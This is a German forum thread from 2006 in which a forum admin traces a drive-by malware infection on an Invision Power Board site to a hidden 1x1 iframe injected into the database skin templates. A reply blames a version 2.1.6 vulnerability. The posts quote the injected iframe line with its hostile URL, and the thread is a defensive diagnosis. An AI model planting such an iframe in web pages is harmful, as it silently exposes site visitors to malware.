stylus740 0 Report post Posted July 21, 2006 (edited) Hi, wir haben IPB 2.1.7 und seit heute klagen User über eine seltsame emf datei, Viren etc. Die User erleben etwa Folgendes: http://img.photobucket.com/albums/v167/Hastin/ffiexvirus.jpg http://img.photobucket.com/albums/v167/Hastin/iexvirus.jpg (Diese Bilder sind nicht von unserem Board, ich habe sie nur bei der Suche gefunden, ohne dort auch ne Lösung zu finden) Über "Quelltext anzeigen" findet sich folgender Code: </style></head><body><iframe src="http://zhmbscwdgk.biz/dl/adv771.php" height="1" width="1"></iframe> 2 Fragen nun: a) in welcher Datei finde ich vermutlich den Schadcode, der den obigen Link anzeigt? Habe jetzt lang und viel gesucht und vermute fast, dass da irgend was "von hinten durch die Brust ins Auge" programmiert ist oder so.... Ist das Expolit bekannt? Gibt es dagegen einen Fix? Googel suchen nach 'adv771' oder 'zhmbscwdgk' brachten jedenfalls kein wirkliches Ergebnis.... Hoffe, jemand kann mir trotz Sommerhitze weiter helfen Bye Edited July 21, 2006 by stylus740 Share this post Link to post
stylus740 0 Report post Posted July 21, 2006 So, die Frage 1 ist beantwortet. Folgender Text: <body><iframe src="http://zhmbscwdgk.biz/dl/adv771.php" width=1 height=1></iframe> stand nicht etwa in einem php, sondern wurde letztlich in der mysql db gefunden. Und zwar unter 'look and feel' - 'skin manager' - 'html manager' oder so.... Die Frage, die bleibt: Wie kommt das da rein und was kann man dagegen tun? Bye Stylus740 Share this post Link to post
WalleniuM 1 Report post Posted July 22, 2006 dorthin gekommen ist es über eine sicherheitslücke von 2.1.6 wohl. selbst wenn du jetzt 2.1.7 hast (das die lücken stopft) kann ja schon was drin sein. benutze den virenscanner im adminpael zum prüfen! Share this post Link to post